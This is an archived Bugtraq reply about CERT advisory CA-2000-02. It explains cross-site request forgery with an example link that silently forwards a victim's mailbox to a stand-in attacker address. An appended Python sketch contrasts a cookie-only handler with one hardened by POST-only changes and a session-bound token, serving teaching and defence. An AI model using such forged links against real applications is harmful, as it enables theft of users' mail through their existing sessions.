Bugtraq mailing list archives

Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT


Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example com

It would forward all of your mail to badguy () example com. This would work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
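
The scenario in the message above, as an added example that is not part of the original post: a Python model of the hypothetical mailbox.asp, first acting on any request that carries the session cookie, then hardened so that a followed link cannot change state. Every name here (`SESSIONS`, `csrf_token`, the two handlers, the sample session id and link) is constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)   # constructed per-deployment secret
SESSIONS = {"sid-123": "victim"}       # constructed: session cookie -> user
FORWARDS = {}                          # user -> forwarding address
# Constructed link modelled on the one in the message (mailbox.asp is fake).
LINK = ("http://intranet.example.com/mailbox.asp"
        "?action=forward&item=all&recipient=badguy@example.com")

def csrf_token(session_id):
    """Token bound to one session; only pages the app renders contain it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def vulnerable_mailbox(method, url, cookies, form=None):
    """Trusts the session cookie alone, so any followed link can act."""
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return 401
    query = parse_qs(urlsplit(url).query)
    if query.get("action") == ["forward"]:
        FORWARDS[user] = query["recipient"][0]
    return 200

def hardened_mailbox(method, url, cookies, form=None):
    """State changes require POST plus a token a third party cannot know."""
    sid = cookies.get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return 401
    if method != "POST":
        # Reads are fine; a link that names an action is refused.
        return 405 if "action" in parse_qs(urlsplit(url).query) else 200
    form = form or {}
    supplied = form.get("csrf", "").encode()
    if not hmac.compare_digest(supplied, csrf_token(sid).encode()):
        return 403
    if form.get("action") == "forward":
        FORWARDS[user] = form["recipient"]
    return 200

if __name__ == "__main__":
    cookies = {"session": "sid-123"}   # browser attaches this automatically
    print(vulnerable_mailbox("GET", LINK, cookies), FORWARDS)
    FORWARDS.clear()
    print(hardened_mailbox("GET", LINK, cookies), FORWARDS)
```
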